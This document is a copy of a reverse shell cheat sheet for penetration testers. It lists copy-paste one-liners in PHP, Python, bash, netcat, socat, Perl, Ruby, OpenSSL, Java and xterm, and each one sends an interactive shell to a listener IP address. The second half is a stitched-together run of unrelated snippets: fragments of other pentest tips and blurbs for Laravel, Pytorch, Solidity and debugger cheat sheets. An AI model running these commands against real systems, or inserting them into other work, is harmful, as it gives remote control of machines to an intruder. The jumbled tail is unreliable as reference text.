If you’re lucky enough to find a command execution vulnerability during a penetration test, pretty soon afterwards you’ll probably want an interactive shell.
If it’s not possible to add a new account / SSH key / .rhosts file and just log in, your next step is likely to be either trowing back a reverse shell or binding a shell to a TCP port. This page deals with the former.
Your options for creating a reverse shell are limited by the scripting languages installed on the target system – though you could probably upload a binary program too if you’re suitably well prepared.
The examples shown are tailored to Unix-like systems. Some of the examples below should also work on Windows if you use substitute “/bin/sh -i” with “cmd.exe”.
Each of the methods below is aimed to be a one-liner that you can copy/paste. As such they’re quite short lines, but not very readable.
php -r '$sock=fsockopen("192.168.0.5",4444);exec("/bin/sh -i <&3 >&3 2>&3");'
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.0.5",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
bash -i >& /dev/tcp/192.168.0.1/8080 0>&1
nc -e /bin/sh 192.168.0.5 4444
socat tcp-connect:192.168.0.5:4444 system:/bin/sh
perl -e 'use Socket;$i="192.168.0.5";$p=4545;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
ruby -rsocket -e'f=TCPSocket.open("192.168.0.5",4444).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
On your machine (to receive, not a normal TCP connection)
openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes # generate some arbitrary cert
openssl s_server -quiet -key key.pem -cert cert.pem -port 4444
On PWN'd client
mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect 192.168.0.5:4444 > /tmp/s; rm /tmp/s
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5< >/dev/tcp/192.168.0.5/4444;cat <& 5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()
xterm -display 192.168.0.5:4444
1.bash bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 2.perl perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp")); if(connect(S,sockaddr_in($p,inet_aton($i)))){open(S
http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet Reverse Shell Cheat Sheet If you’re lucky enough to find a command execution vulnerability during a penetration test, pretty soon
Mobile An Introduction to Cordova: Basics Web Angular 2 versus React: There Will Be Blood How to Become a Better Node.js Developer in 2016 Debugging Node.js applications using Node Inspector Node.js l
[译]Thanks [原文]AverageSecurityGuy 这里整理了许多渗透测试中实用的TIPS,希望对您有用。PS.仅用于安全渗透测试及学习,禁止非法使用。 共享相关 # Mount Windows Share with Null Session net use x: \\server\share "" /u: # Mount NFS share on Linux mount -t
Reverse Shell Cheat Sheet Bash Bash URL Encoding Netcat Netcat Linux Netcat Windows Netcat URL Encoding WebShell ASP WebShell PHP WebShell Log Poisoning WebShell SSH FTP HTTP Server Side Template Inje
CheatSheet This repo contains useful cheatsheets for several Programming Languages.Feel free to use the CheatSheets to help learn new skills. The following languages and libraries are currently availa
A cheatsheet for the Python Debugger (pdb) You may download a PDF or PNG version of the cheatsheet from thepdb-cheatsheet releases page.
创造不息,交付不止 Introduction A quick reference guide (cheat sheet) for Laravel 5.1 LTS, listing artisan, composer, routes and other useful bits of information. We intend to build this Cheat Sheet more asse
Pytorch Cheatsheet For more updated examples, see: Pytorch Kaggle Starter.
Solidity Cheatsheet and Best practices Motivation This document is a cheatsheet for Solidity that you can use to write Smart Contracts for Ethereum based blockchain. This guide is not intended to teac